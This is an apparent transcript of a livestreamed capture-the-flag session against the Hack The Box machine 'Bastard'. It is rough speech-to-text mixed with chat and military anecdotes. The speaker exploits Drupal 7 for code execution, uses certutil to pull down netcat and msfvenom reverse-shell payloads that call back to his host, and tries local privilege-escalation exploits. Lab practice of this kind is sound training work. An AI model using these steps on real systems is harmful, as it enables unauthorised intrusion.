So we're back. Bastard was the next one that we were going to do, right? I believe it was. So we got Bastard here. Was it Bastard? I thought we started up the machine. For 10, 10, 10, 9? Thought it was. Thought that's which one we were doing, like right there. Alright, let's go ahead and let's see what we got here. We got 10, 10, 10, 9. This one looks like more of a medium box. So let's go ahead and CD that back, make a directory for Bastard. And we'll CD it in there. And let's start up with our mmap scan, right? On 10, 10, 10, 9, it looks like. Let's try this guy. See what we can get. ActiveBox is not like mmap, huh? Still connected to my VPN, right? Yeah, I am. Okay. Yeah, we're pinging them. Okay, there we go. We got 80, 135, so we have RPC on there. So let's go ahead and check out an RPC client like real quick. On 10, 10, 10, 9. See if we can get anything on there first. If it is actually working. Oh man, this one might be moving slow. Let's give him a minute. Thought we already started him though a while ago. So he cannot connect to RPC client. We do have port 80 on there. Let's go and check that out. Start with mmap TACP 80. 10 to 10 9. See what we got in there. And let's go and check out that port 80. Some light in here. This one is moving a little bit slow. So it does say, okay, so we got Drupal on there. Drupal 7. So we may actually be able to do a Drupal get-in. If we look up search exploit, Drupal, right? There's a lot of stuff in here. But I believe Drupal 7 is Drupal get-in. Drupal get-in. There we go. So we do have Drupal running on it. So that might... And it looks like we have a robots.txt on there also. With a whole bunch of stuff on there. And we obviously have a MySQL because we have installed MySQL. And this was an SQL injection. So let's go ahead and let's try a Drupal get-in on there. Let's go ahead and do a search exploit. TAC-M. For him. Let's go ahead and cat that guy. Let's see what we got going here. So we need a host and also a user and a password. Ooh, is this authenticated? So it looks like we need, this is an authenticated. This is authenticated, so pretty much all of them are authenticated. So we need to get into this guy first. I wonder if like admin, we try off with that. Let's see here. Drupal. Passwords. And then Drupal 7 exploit. Drupal default. Default passwords. So I suggest saying the default password admin. Of course you would. So username, password, admin, it says. I suggest saying it to admin. Of course you would. You would suggest saying it to admin. And that's in the Drupal. Default username and password for Drupal. When I read install text, it says that you're automatically logged in after the install. What is the default username and password? Check your database to MySQL. We might have to actually look around in here, like this guy like right here, something like that, and actually find some stuff. So let's go ahead and look at that robots.txt like real quick, because we saw that does exist without even forcing it, because mmap is nice to us. Wow. Disallow change log, admin, node, user register. Got a lot of disallows in here, huh? Let's see if we can do that. Wonder if we can get anything off this guy. Okay, nothing in there. Wonder if we have like the config file or anything like that in here. Okay, not seeing anything yet. Let's go ahead and start reading some of these different Drupal exploits that we can do here. And we'll try to do some different things that we can do. We can also probably, let's go ahead and also look at that change log. Okay, so it looks like he last uploaded 7.54. So that was the last one they uploaded, like right there. So it looks like we're looking at Drupal getting 3, right? Which is still authenticated. Now remote code execution. He did 7.54, right? Authenticated, authenticated. Huh. Okay, so now we just need to figure out what would the authentication be for this guy. So, need Drupal get in. We have to figure out what the hell the authentication is for him. Can we create a new account? Okay, so we would need a email address. And then, okay, so we need to know the email. Unrecognized username or password, okay. So we can't create a new account. So we should be able to, let me see here. I've done Drupal before, but usually I have the credentials for it. So that's what I'm kind of confused about like right now. Could always try to brute force it with admin or something like that. Let's look at this robots like right here. What if we do a SQL injection on this thing with SQL map or something like that? Let's try SQL map. It's most likely non-injectable. Might be able to do a remote code execution. I don't know if this needs to be authenticated or not. Cat 4448. Let's go ahead and throw the URL at it. 10.10.10.9. Why is that invalid? Maybe we'll make it, let's do a sudo nano etsy host. We'll do 10.10.10.9. Let's make it, forgot what the name of this box was. Bastard.thm. Try that again with HTTP bastard. I did THM, didn't I? Not hack the box. Whoops. Whatever. Why is that invalid? Yeah, that's super weird. Okay. So, how are we going to hop in this guy? We have Drupal so far, which we know we can do. We know there's stuff that we can do with Drupal, right? We know we're running 7.54. Just need to put the target in there, maybe? Let's try this. Ten to 10.9. Okay, so it doesn't like that target. Let's go ahead and search play for Drupal again. There's a couple in there, right? 444 now. Let's go ahead and grab that one. That's a Ruby. It's not Metasploit. It's a Ruby file. Don't really see them. It sound right to me. Drupal get in 2. RCE Python. Okay, this one looks a lot different than what we just had. Let's go and grab this guy. nano exploit.py. We'll try this. cat.exploit.py. Let's see what going here. Drupal getting 2. Target URL. Tag T, the target. So the target's going to be 10, 10, 10, 10, 9. And then tag C, the command. Who am I? Exploit successfully sets the target. Okay, but we're not getting the who am I back, are we? Okay. We're not seeing anything back, though, from that. Does that have to be HTTPS? I don't know about the other one. The other one may have had to be HTTPS, which was, I feel like, kind of weird. You know? So that's pretty freaking weird, like, right there. Let's see here. Oh, excuse me. Drupal 7.54, right? Is that what we had? Exploit. Let's go and try that. GitHub. Let's go and look for this guy. Oh, code execution. Looks like it's not really. Okay, what is this one like right here? Exploit that vulnerability. Okay, I pointed to recover password system. Okay, I'm gonna grab this guy like right here. We'll try that. Let's see what we got here. No route to host. Huh? This is super weird. Maybe no route to host. You can ping yourself and watch total 0 for ICMP. Could try that, but I mean, we need to. You same with the other exploit that we had? The one that we just, I just deleted? Let's see here. Drupal exploit PHP. What is this guy gonna do? File name.php. So this one's gonna make us a little thing here, so we can do a question mark like PHP equals. Looks like. Use the SQL injection to get contents of the cache for current. Okay. Also the cache to allow us to write to a file. Do so. Restore the cache. Okay. So we can always try to do something like that with that PHP. remote code execution, right? And we can try to send that across. So I'm just calling for a URL here. Let's go ahead and copy that, and we'll start to look at this guy. Exploit.php. Oh, Sublime exploit.php. This one's a lot bigger. There we go. Okay, so it's calling for a URL somewhere. There we go. URL equals HTTP 10.10.10.9. All right. We have a file name there. Do we have to actually change up that file name, I'm wondering? Because I feel like, where's that file? Shell.php. So it's going to try to get shell.php and put it in. So if we make shell.php call for something, right? Let's make sure it even gets it first. How the hell would I run the PHP file? Just PHP, exploit.php. Okay. Feel like we need to do more than just that. Feel like we need to actually create a shell.php file. Let's just see if it'll call back, just be like, hey, that file doesn't actually exist. Let's try this one first, actually. Nothing. Let's go ahead and sublime that guy again. What's going on with this guy right here? 10 to 10.9. REST endpoint. Do we have REST on here? Can we get to REST? Okay. REST endpoint has been set up successfully. Okay, cool. So REST endpoint has been set up successfully. So I feel like try that like right there. Whoops. Save that guy. And let's try that again. Nothing. One second. That was weird. Door just opened up. Oh, initiate. Okay. Can you show line 247 PHP file? Yeah. Let's go ahead and look at that. Line 247. That's strange that we're having Python one didn't work. PHP one right now isn't working, but I mean it could. Oh. Hey, thanks a lot for following Math Rankulu. Thank you very much. Okay. How you doing? We have a /rest, right? 10.10.10.9/rest. We have a shell.php. Endpoint path. Where is it supposed to go to the endpoint path or just the endpoint? I'm wondering now. Maybe I need to actually change this out like right here with the data thing, right? Because it's going to a let me grab this like right here. Maybe it's not actually reaching back to me, right? Save that. Let's go ahead and try that again. Line 30. Thing that we just changed out. What does it say now? It says expecting that in order. So save that thing that we actually had. I mean, did they pretty much have close to the same thing before? Let's use the other one. I think it's actually, I think I know what the problem is. Might be that. Let's try that one like right there. Not echo shell command, but okay. No, would it be because then once we get it, we should be able to just hop on the system and use it. So we go to shell.php and use that actual command like right there. I think that's the reason why. See, I don't think we're gonna get a callback. What the fuck, yo? What do you want from me, PHP? You have it right there. I don't understand what else you want. You already have it end of file. Okay, PHP, you're pissing me off. You have your end of file like right there. I don't understand what else you could possibly want from this guy. You have it literally right there. Do I need a comma after this? Is that what the problem is? I don't think I do, but no. Okay, so that has nothing to do with it. Read this chat. What's up? This time's so funny. Put command in and not that. Okay, you're saying you want me to do something like this? Ah, I see what you're saying. Okay. I see. You're saying like this. Like that. Try that guy right there. Let's see what happens. Line 247. Okay, let's go. thought I saw a PHP one over here earlier. That one. Let's try him. It's like the same thing. That's great. It's good to see. Endpoint is /rest. We know that now. Data is not that. I believe it might be this, like right here. Command and like this. Okay. Yeah, now the next error, yeah. I know, right? Function curl initiate on 254 stack trace. Oh God. I love like old exploits because they work so well all the time, you know? Old exploits always work the best. On 247, it is just calling it curl. That's all it's doing. What was line 247, right? Line 254. Does it not have curl on here, maybe? Maybe the machine doesn't have curl on it? I don't know. What are you doing? You know, we actually don't know what we're doing like right now. We're trying to fix this PHP file so we can do a Drupal exploit, but it doesn't seem to want to work like right now. So that's a great question. What are we doing? So I actually have no idea. Huh. And the other ones are, so we have 7.5.4, right? Well, we do have another one. We could always run the Ruby script up here. Do a DOS to Unix or whatever it's called. Where's that Ruby script at? Right here. 4449. Let's go and grab him. Or do we already have him? We do. Okay. Let's go and do a DOS to Unix. 4449. Ruby. Okay. Jesus. He's got shell.php. Look at that. Request C. I feel like I need to put a URL in here somewhere, right? No proxy. User agent. Web shell. Define HTTP request. URL. Some people get. So I think I'm supposed to give it the URL I'm going to go with. I think that means that I'm supposed to actually like, hey, tell it what URL I want to go after, right? Try that. Cannot load such file Highline. Okay, so maybe we have to download Highline. Let's try this. So we have to get install PHP curl. Is that? Is that like a thing? Oh, okay. Try that PHP one then again. Ow. Just hit my knee. Is that what that was telling us? Is that what that was trying to say? Like, hey, like, why did I just say that? Can't find this. Okay. Nice. Let's go. Thank you. Linus didn't make Linux. Which Linus? Which one? Alright, so all we gotta do is install that. Okay, cool. Probably should have actually looked up what the error meant, huh? Probably would have said install that. Okay. So supposedly, crap. I wrote it to there. Should definitely change that to the one that had shell.php already, huh? Alright, whatever. Let's go ahead and grab that. Because we should be able to go there now. I don't remember how it was even written actually. Was it like a C or like a command? Command equals ID? So like that. Okay. NT Authority iUser. So, well, it is a Windows box. I'll say we're using IIS here. Alright, we are getting somewhere. So we should be able to download, I don't know, Netcat, or we can, let's just do Netcat, because I'm tired of reverse shell. Locate netcat.exe or netcat64. Let's do a system info, see if we can get that. We can. Alright, let's do it like this, see if it looks any prettier. It does. x64. Okay, so let's go ahead and download netcat64. And I'm wondering, like, can we do like a PowerShell? Who am I? We're going to use like a cert util. I think we're going to be using cert util to download this guy. Stop him. Okay. Let's go ahead and do copy NC64 over to here. And we'll make a Python server, right? Bastard. Python 3 HP server up port 80. See, I don't really ever do the tech C for the command. And a lot of times it just works. But maybe let's do a PowerShell tech C. Who am I? I don't really ever do the tech C. A lot of times it just works. But that's usually on, I'm already in the command prompt. You know? So, oh, they're all going to be Windows machines. My Frank Yulu. They're all going to be Windows machines, so let's try who am I again. Okay, so it looks like we're going to be using cert util. So let's go ahead and grab my cert util guy over here, right? Because we already have that. I'm going to use the cert util a lot today. And let's do nc64.exe. And we'll do nc64.exe. And we want to download that from 10.10 15.4? 14.5. I'm getting the numbers correct. They're just not in the correct places. Which that should be really good enough for IP address, right? Let's try that. I don't know if we need to like, okay. So it did get it. So we got that. So let's go ahead and do a netcat. Should be TAC E, right? So let's do a NC LVMP on 4444, and we'll just do a netcat64.exe TAC E 10 10 14.5 4444. Is it just that? Is that it? Crap. I forgot to do a netcat TAC E. Forgot to do that. Could always put a shell in there, like a reverse shell, right? I don't think we're gonna be able to do a PowerShell payload. So tacky. Okay, I know we can do it. I've done it before. I 100% know that we can do that. Let's go ahead and try to just put in a reverse shell then. So let's go ahead and do let's get a listener up and going. Let's just do an MSF Venom TAC P, and let's do a shell reverse TCP for now. We know it's an x64 system calling back to B, port 2222, that's fine. And we'll just call it shell.exe. And then we'll go ahead and we'll upload that guy into there. We'll name that shell.exe. Okay, let's go ahead and use exploit multi-handler. Set the payload to this guy, like right here, right? Set payload to that. Set lhost to that. Set lport to 2222. Run him. Head back over to here. Download that shell.exe. Alright, looks like you got it. And then we'll just try to run shell.exe. And let's see if we get a call back over here. And we do. Okay. Who am I? And I'm NT Authority iUser. Okay. CD dir cd dir cd into. Can I go into administrator like this? Or users? No. Cool. What about Demetrius? Type user.text, so we got one of them so far. Okay. Well, we can't get an administrator like that. So now we've got to figure out how to escalate our privileges. I think that's a 4 or 3. I would say a 4. And it did take us a minute to do it. Kept spitting back errors. Alright, so now we just need to figure out how are we going to escalate our privileges. We can try to use Sherlock again. We can use exploit suggester. Let's go ahead and let's try Sherlock again. Let's go ahead and do that. Because I don't think are you allowed to use exploit suggester on OSCP? I feel like you're not. I really do. I feel like you're not allowed to use exploit suggester. Maybe you are. I don't know. Whoopsie daisy. Going down that. And let's go ahead and oh crap, that's not gonna work, is it? I don't really want to abort the session. I just want to tell you that, hey, that's not gonna work. 10, 10, 14.5? I think I'm getting there. Yep, 14.5. Alright, I'm getting there. I'm doing it. Getting better. Alright. I'm gonna run that again. See if we get a call back for it. Hopefully we do. Might have to make another PowerShell executable. Oh, that was cert util. Whoops. We already downloaded that. Hopefully I don't break the box. Okay, we're already in. Never mind. Break away. Alright, let's try to go into PowerShell. Let's see if we break this guy or not. And, yep, that's not going to work. Let's go ahead and try to get a PowerShell reverse shell then. Let's go ahead and do that. So let's go ahead and set the payload to Windows x64 PowerShell. God damn it. PowerShell, it's going through itself. Reverse TCP. Set our L host to that, set our L port to that. Okay, let's go ahead and let's make this shell ps.exe. And we'll make this shell or PowerShell reverse TCP. Go ahead and do that. So I'm going to run that over there. And we'll try to throw this guy back up there for shell ps.exe. So we need a shell ps. We'll do shell ps. We'll try to use Sherlock again. That was fun last time. Try to download him. And hey, thanks a lot for the follow, Nixabeg. Nixabeg? Nixabeg? I think I'm getting there. Saying stuff. I'm saying stuff with things. Alright, he hasn't downloaded over there yet. Let's go and stop him. Give him a second to relax. Do shell ps.exe. Shell ps.exe. Let's see if he pulls him back from over here. Okay, he did. Cool. So now we can go ahead and try to run that shell ps.exe. Let's see if we get anything over here. We do get a PowerShell. There we go. Okay, cool. So we did put, I forgot where we put it at though. So we're just going to grab them again. wget HTTP. Well, let's do an IEX. IEX, IWR, HTTP, Sherlock.ps1 or 10.10.14.5 / Sherlock.ps1. See if we can do that. Oh boy. We're on an old ass system. Okay, can we do a wget at least? Oh god, we're on an old ass system. Which means, how do you get your balls bigger? Your balls bigger, please need advice. I mean, you could, so heat expands. There you go. Heat, that expands. Alright. I don't remember how to download PowerShell in PowerShell CLI without wget. Invoke web request? Is that it? But it said they couldn't find IEX or IWR last time, didn't it? Do we need an out file? Is that what that's saying? Tag out file, yep. You piece of shit. I hate the old PowerShell ones. Oh, curl. Wonder if it has curl on it. Can always try to use curl. Okay, nope, no curl. Maybe with candy in a van. Hey, thanks a lot. John on click. Thank you very much. Okay, so we want to, can I go in command prompt from here, then go back into PowerShell? Or is that just going to jack it up? Alright, don't mess around with this. Let's just go ahead and we are going to I forgot what the command is for Sherlock though. Anybody remember what the command was for Sherlock that we used? It was in here, wasn't it? Find all vulns. There we go. So I'm going to actually make a little thing of that. Payload to Windows x64 shell reverse TCP. We're going to call back to shell.exe. Call back to that. Get a call back over here, hopefully. I'm going to go with curl's not installed because we had curl exe and it was like, yeah, I don't know what that is. Should have got something with that shell.exe, right? There we go. Okay. So now let's go ahead and do a PowerShell. We can't even do IXIWR. Oh, you know what we can do though? We can do a cert util for that guy, huh? So we could do a 10.10 14.5 Sherlock.ps1. Let's go and grab that. CD into C that users. CD into Demetris. CD desktop. Go and grab that. Access denied. Okay. I just can't do a cert util. Okay. But I can do it with the other. Hey, thanks a lot, Devis Life, for the file. Can we go into C Windows temp and do it? Okay. So we can. All right. So we got it in there. Okay. So let's go ahead and do a PowerShell. See if that works. If that doesn't drop anything, we're just going to use exploit suggester and see if we get anything with that. So it looks like that guy does not want to run. That's good. On Windows, Pat Jack, so curl.exe and curl would be the same thing. But if you do a curl.exe, especially with older systems, it'll more likely work. Usually you have to put the exe in there on Windows with older systems, just to make sure that's going to work. So if we would have ran curl or curl.exe, it would have done the same exact thing. Let's go ahead and search, or yeah, let's go ahead and search for suggester, use 0, show options, sessions. Probably on session, set session to 5. PowerShell doesn't want us to work with this guy, so we'll pull this number like right here. It is collecting some exploits. We do have the correct... I feel like that is 100% a lie. Like, I really, really feel like that's a lie. I feel like Windows Exploit Suggester is not... Because the last one said there was 0. And we used exploits on it. You know what I'm saying? We did literally one of the exploits. So, I feel like Windows Exploit Suggester is messing up. All right, let's run exploit suggestion now on session 6. Actually, let's get system since we're already in NT Authority I, whatever it was. Or can we break it? Whoopsie daisy. Okay, so now I really get system. Okay. Reload incognito. List tokens. No tokens. Okay. You never know. You know, you never know. So set the session to 6 now. Try that again. See what we got running on there. Maybe migrate into another process. At least since we have a terminal shell now, if we go to shell, the power shell, if it breaks, then we can just control C and we don't actually lose everything. So, that's a positive. Oh, look at that. That's weird, isn't it? Uh-oh, might have broken it. Might have to run it again. It was not interrupted by me. Those are complete lies. Fake news. Right there, fake news. Oh, man. Anybody else stream? Gamzo. Huh. I don't think I ever watched him. Alright. Usually it doesn't break on exploit number 3. Usually, you know, it takes a little bit longer than that to break. Alright, this seems to just be breaking it. So let's go ahead and go into session 6. Shell. Actually, nope. Let's try to upload Sherlock.ps1. Okay. Shell. PowerShell. Import module. Sherlock.ps1. We do that. No valid module file was found in any module directory. How? Then we just import it? Sherlock.ps1. Can we go into PowerShell now, or is it going to tell us no? It's going to tell us no. Okay. What did we just do last time? We just did a MS 16, was it? Tech 034, right? I want to try to find that Empire script again. Yeah, I want to try to find this because they had the actual. There we go. Let's go ahead and try to run this on it. And I also got to save that too because notice I've been getting into more and more PowerShells lately that aren't really that good. 10.10, 14.5, Sherlock.ps1. Okay, just grabbed it. So hopefully we start seeing some type of output now. Because it should grab and then run that file. Should. Guess we'll find out. And it is not. Okay. Well, that's shitty, huh? So it's not running that. So it's running this guy. See if anything's running as anybody else. No. Yep. It's kind of what I figured. Let's do it manually. System info. So we have OS version in that. On a 2008 R2 data center. Right? So let's go ahead and check that out like real quick. 2008 R2 data center. Exploits. MS11046. Okay. Okay, it does work on 64-bit, okay. What is it actually called again? It's called an AFD.sys. Let's go ahead and try to use that one. Probably going to say that I can't do it because it's not supported by 64-bit system. Okay, so that's not it. Okay. Morning, Christy. How you doing? Could always try that. Windows exploit suggested. Well, .py. We could always try that, like right there, huh? But Windows exploit suggested .py. Don't we need that? Let's go ahead and grab the system info. So we grab system info.txt, right? So let's go ahead and do a just woke up. How's you? I'm doing pretty good. It's a beautiful day today. We've been having a lot of problems with Windows exploit suggester, or just exploit suggester in general. With the past couple boxes. Actually, last one though, we were able to get Sherlock running on it, and that gave us an exploit, which exploit suggester wasn't giving us. This like right here is also not giving us anything, but I'm also using Metasploit version 6. So a lot of these boxes are like 2008 and stuff like that. So I mean, all right, let's go ahead and do a system info again. And let's go ahead and grab all this. And I think we can just copy this. I think we just do a little Sublime text for it. Sublime system info.text. Okay, we just do that. I think this is how we run. I never really ran Windows exploit suggester.py. Let's go ahead and locate it. Suggester.py. Do I have that? I do. Okay, cool. So let's go ahead and copy that over to here. And we'll do let's go ahead and cat it. See what it's all about. I might want to do a Sublime text for it, huh? So let's go ahead and do this. Windows exploit suggester. But yeah, we're trying to get through the TJ Knoll Windows boxes today. So I don't think it's going to be like a 24-hour stream. I've done that once before. I don't think we're going to do that. But we will, and it lasted 18 hours, I think. That was for all the Linux ones for Vault Hub. But, so I don't think we're going to do that. But, I do feel like we're going to, take a long time to do this. Pip install. Do I already have all that? Read a system info input and points to the Microsoft database. TAC database. Ooh, where do I get the database from? And point it to the Microsoft database. How do I get... I've never used that one before down there, so... How do we actually use you? TAC database. So where's this database at? Microsoft database we need? So we need a Microsoft database for Windows exploit suggester Python. How do I do that? That's in Japanese. That's going to be rough. Anybody here read Japanese? I do not. Do we just tell it like a database? Like, is the database like already built into the thing, I wonder? So I wonder if we were just to do something like this, right? Bam. It's 2008, so 2014 database should work just fine. I wonder if we were just to do something like this, if that would actually work. And then it was TAC system info. It's system info.text. Can we do that? Okay, so yeah. Let's actually locate Windows exploit suggester again. Let's locate this guy again and see if there's a database in that folder. Let's actually CD into there. Not. Okay. And this one is bastard, right? So where do I get that database from, I wonder now? What if we just need to install these dependencies? Point to the Microsoft database. But what database, though? Or if we just need to install these dependencies and then we get... Oh, that's not going to work, is it? Pip install. There we go. Where do we get the database from? Should we build the database from Microsoft and checks against it? Well, where are you pulling the database? That's what I don't understand. I mean, it's pulling it from us, but where do we find that database? Where to find Windows exploit suggester database from Microsoft? Microsoft vulnerability database? Where is that at? Microsoft vulnerability database. This is a hard-ass tool to use, I'll tell you that much. Okay. I don't know where to pull it from that database, so no idea how to get to that. Let's Chipper session 7 opened up. Okay, cool. Why'd that open up? What is that for? Okay, that's weird. Set to session 7. Run that again. So weird. It's not able to find anything, but all these are pretty freaking old too. So came across semi-automated window. Okay, typically boom boom. So we got that right. And this post will make use of the GD security tool through as well git clone. Okay. Now transfer system info and run the suggester. Okay. The above two exploits are available. Fortunately, PyInstaller allows us to convert Python scripts. Follow instructions here, which spits out. Fortunately, there's an alternative, but unlike the tool, it does not differentiate between those Metasploit and those publicly available. The script which automates this. See if they're exploitable. I came across it's kind of a I wish it would tell us where that's at. Dude, I am not stopping that at all. I keep saying I am, but I'm not. Have you tried WinPeas yet? I've not tried WinPeas, no. That's a good point. I have not tried WinPeas yet. So we'll try here in a second. I really just want to know where to get this database from. You know, like where are they pulling that down from? Like, can I just copy that? Paste it? Oh, God, I hate the copy on Sublime Text. Control C does not work. How about that? Where? Where do you get that? Okay. Fucking useless. Let's go ahead and locate wind piece. Copy that over to here. And we'll do a upload wind piece. Shell, let's go ahead and run that. Let's try this guy. You been to Korea? Yeah. Been to Korea twice. First time I was all the way. No, been to Korea 3 times. First time I was all the way up in DMZ. Second time I was in Seoul. Third time I was in Mujuk. So it was a pretty good time. Mujak's a pretty horrible base. Hear the dog screaming outside. Were you at Camp Mujuk, Hunterbot? Because if you were, I always forget that bar. What is it? The Dirty Cow or the Drunken Cow or whatever? That bar that I think it's Dirty Cow, isn't it? That's outside the base there at Mujuk. Oh, you worked at Mujuk! Oh my god. All right. They had the dog farm out there. That was. Remember you try to go to sleep at night and there's freaking dogs screaming because they had a dog farm. Yes, that's a thing. Okay, before people. All right, that's a thing in other countries. All right, just because we don't have dog farms in America, doesn't mean it doesn't happen in other places. But yeah, Tipsy Cow. That's what. I remember they had the worst, what was it? God, mozzarella sticks. They were so nasty. But Mujuk was such a horrible place that was like the best thing you could do was go to the Tipsy Cow. And then there was that town right outside of it. I remember that town, there was a bar that was like right next to the water over there. And my buddy got pulled up out of the bar, right? And the bartender like took his shirt off. It was some dude bartender too, right? He took his shirt off and wanted him to dance. My buddy was just standing up there like, what is happening, right? And he's a big boy too. So I'm sitting there and I'm like, dude, I can't let him just be stuck up there like that. So I try to get him down and the bartender's like, no, he's holding him up there, right? And the only word I know is come sabidad. So I'm just like screaming, come sabidad at this dude, That's it. And all that means is thank you. So that's what I'm doing. So I finally hop up on the bar with my buddy. And I start dancing around, so he finally, start dancing and stuff. But yeah, that was, oh man, good old freaking Camp Mujuk. That was a good time. I'll tell you that much. Camp Mujuk was a good freaking time. So, let's go ahead and try to run it. Let's go ahead and run post Windows. There should be exploit suggestor in here. Because that guy wasn't working at all. I thought there was a one in post Windows, wasn't there? Or is it post multi-recon? Exploit. Local exploit suggestor. Let's try that. Let's try to run it right on the machine itself instead of trying to go through Metasploit and the sessions and everything. Let's run it like that. And see if we get anything. But yeah, Hunterbot. Korea was a fun place. There's like no traffic laws. There's stoplights and stop signs, stuff like that. But it's just, if you feel like stopping, you do. You just gun it on the throughway and they just slam on the brakes right when the cameras are coming up and then gun it again. So you're just doing that the whole time. Just doing that. Oh man, Korea was a great place. That was a lot of fun. I've always had fun there. That was my 3rd time there. Was when I was at Mujuk. That was one of the most fun times I've had. That chow hall was freaking awesome, though. I was Advon. We got to use that chow hall. Yo, I am not stopping this. Stop saying it's interrupted by the console user. I hate that. But yeah, the first time I was there, I was up at the DMZ. We were training for Iraq, right? So I was there during the middle of winter, okay? We're training for Iraq in the middle of summer, right? We're doing... Nobody knew what to do. So we literally had sticks set up on the ground, and that's how we did our house hunting, right? That's how we stacked up. So we stack up against these sticks, right? They're on the ground, and you just had to use your imagination for everything. And you come into a place, oh my God, it was the worst. I'll tell you that much right now. It was the worst, doing all that. I'm going to try to do like an X86. I'm going to try to make like something like that, and then we'll run this again. Let's try to make another shell on here. Let's do a MSF Venom. Let's just make it a X86. There we go. We're just going to do a interpreter shell instead of messing around with all this stuff. Interpreter, reverse TCP. We'll do it on port 3333. But yeah, it was middle of winter. We were sleeping on the hood of a Humvee, right? And, you know how Korea gets. So we're all just freezing, right? I'm from Syracuse, New York, and I was freaking freezing, right? We're all just freezing up there. That was a good time. That was a lot of fun. That was my first time there. Like I've literally been in the Marine Corps at that time for like 4 months or something like that. That was it. 3 months or something. And we were, I was with 9th ESB out there. 9th Engineer Support Battalion. Hey, thanks a lot for following. Aham. Just gonna stick with that. All right, thanks a lot for following. Let's go ahead and upload shell 1. And then we'll go ahead and we'll Control Z, yes. I can't background the channel for some reason. Okay, that's weird. Man, this is being super weird, huh? Let's go ahead and use exploit multi-handler. Set the payload to this guy right here. Set the L port to 3333. We'll run that in the background. Whoops, that's not running in the background. Run that in the background. And we'll go ahead and we'll do a session, TAC I, session 6. Go ahead and hop into there. Thanks for the sharing knowledge. Hey, you know, we're doing something here. Session 6 also seemed to have died, okay. Exit out here, sessions 5. Alright, we're somewhere. And do we have shell1.exe in here? We do. So let's go ahead and run that. Shell1.exe. Let's try to get an interpreter just x86 back to us, and we'll try to run something on there. Sessions 8. Run post multi-recon, right? Exploit, local exploit suggester. Let's see if we can do anything with that. Oh, so I was a wireman, which if you worked on Marine Corps base a while ago, I don't know if you're in the Marine Corps or not. You worked on it, so if you're a contractor or whatever, but you probably, depending on how long ago you were, you probably know what wiremen are. But yeah, I was a wireman at first, like literally the old school, grab the line, you run, and that is it, you know? And then I became then the wiremen, the switchboard operators got rid of the switchboard operators. So I did that right. And I was still a wireman, but then we also did switchboards. And they got rid of wiremen as a total MOS and now a network. God, I am not interrupting it, you fucking fuck. Alright, let's try to reset the box and see if maybe the box is just messing around. Let's try to reset it. We'll see if the box is just jacked up. We'll get back into it. This is not very hard. It's just being a pain, really. We did the PHP one, right? Yeah, that's what we did. Okay. So, and we used I don't remember what port we even used on that. Let's go ahead and cat 415. Oh yeah, we used that allowed us to be able to do Are you a full? No. I'm still network. I got 2 years left before I retire. Nope. Network chief, which isn't really anything exciting. So we'll re-upload shell.exe, which I forgot. Well, we have shell 1 already, so let's go ahead and just we'll just run this because that one's already ready for shell 1, right? And we'll try to re-upload shell 1 in there. Let's go ahead and make sure that this box actually came back up again. So let's see if this is going to work or not. .10.10.19, or is it .9? Whoops, that's not IP address anyways. 10.10.9. All right, so as soon as that goes back up again, we'll try to do this. Try to set it back at it, and we'll try some more. Because this guy, he's being super weird like right now. I think you just reset it, and we'll go from there. Let's go ahead and set that PHP back at it, right? He might not be fully up yet. Doesn't look like he is actually. So, yeah, no, this is just for fun. I hope one day to be able to do this for a living. That'll be freaking awesome. Let's do something like this again. Okay, we can. So we got the system info. So let's go ahead and do a cert util, and we're gonna do this for shell 1, right? Because we just reset the box. So let's go ahead and do that. We should get a call back down here for shell 1, which I believe we do. Yep. Okay, so we're good on that. Now let's go ahead and do shell 1. We already have the interpreter session up and running, right? Well, the Metasploit. So we got that. All right, let's go ahead and do a PS. It's definitely a 64-bit system, as we can see. But let's just try to run post multi-recon local exploit suggester again. Might have to move over back into 64-bit, but we'll see. When are you planning to give your... So I plan to do the OSCP next year. As HunterBot knows, Marines are always around, so we don't always have internet. So I plan on doing it next year because I'm not going to be around for like a little bit. And I'm not going to have internet or anything like that. So this box is taking way longer than what it should. Well, we got past 4 that time. This time we got to running exploit 5. Usually you get stuck on like 11, 12, 13, or 14. Not like 4 or 5. But it's also... I kind of want to migrate into a 64-bit system right after this and see if, God damn, dude, what the hell is going on with this thing? Something weird's happening because WinPeas wasn't working on it. Like, nothing's working on this box. So, we do have that system info. We may be able to do something with that. Like, this is going to be, like, super... R8... 2008 R2 Data Center. Exploits. So we're looking for 2008, right? First, we got to get to there. R2. For x64 based systems. So we got MS17047, MS10047, excuse me. Really? Okay. What else do we got? MS10059. .092. Okay, so this one's got something. MS10073, but that's not actually it. MS10092. Okay. Let's go ahead and use 0. And it's got to be a 64-bit also. That's not going to work either, okay? So let's keep going. So we got MS11011. That's for 64-base system, okay? So let's go ahead and search for MS11011. All right, wasn't that what it was? Supposedly. Oh, no. Okay. Keep going. Ooh, what's this? 046, huh? Oh, that's that AFDS local privilege escalation one. So maybe I'll do something like this, like right here on that guy. Let's go ahead and open that link. Let's go ahead and grab this whole thing. Nano exploit.c. They have 2 network positions open and moved up if you want to take an early retirement. I would love to take an early retirement, Hunterbot. I would absolutely love to. The only problem is that right now, first off, I'm on the Mew. I know that you most likely know what that means. And secondly, I still have 2 years. And they're not. They got rid of that whole what was it, Terror, whatever it was, where you could retire early and everything. That's pretty much gone, unless if it's for, which was always a thing, unless if it's like the change of family, or like the life change. That's like, holy crap, like you need to get out. Like your wife is like cancerous, about to die, and she needs 100% care at all times, or somebody got in an accident and now they're the huge life-changing events, things like that, like they've always had, that they'll let you get out, and if you've been in for so long, they'll just let you retire. They still have that, but I don't have a huge life-changing events, and I hope that I don't have a huge life-changing events like that. You know what I'm saying? Like, that sounds horrible. So, okay. So let's go ahead and go to sessions 9, and we'll upload 40564. Where am I? Oh, well, that makes sense. Okay. Windows 10. Now we'll try to upload it. Okay. It deleted it. Okay, so I can't do that. All right. Does not look like that one. Let's keep searching. We have a lot more to go. MS-13. 005, right? Yep, okay, so we do have an MS-13-005. Try that. Doesn't always go to work. Okay, so set target to 0. Okay, set our L hose to ourselves. Set force exploit. I want force the exploit to be true. I should be able to do that. Set the L port. That's fine, actually. Set session. Let's go ahead and set the session to 9. Doesn't look like we can set the force exploit to true. Okay. Let's keep it looking. We'll get there. We'll find something. 053. Use 1. Set target. That's not going to work for us. Forgot what the session number was. Set session to 9. That's most likely not going to work. Yep, it's not running. That's what I figured. Okay. Okay, that's for a 64 leg right there. 081. Use 0. Sets target. Why does it keep giving me stuff saying that's for 64-bit, but it's not? $14,026. 040. This is taking a while, huh? 058. I was looking for the Metasploit ones, really. 14058. Session to 9, right? Wasn't that what it was? Set our I'll host myself. Run that. Running module against best. Oh man, I thought that one might have worked. Let's try it one more time. Well, that's running. 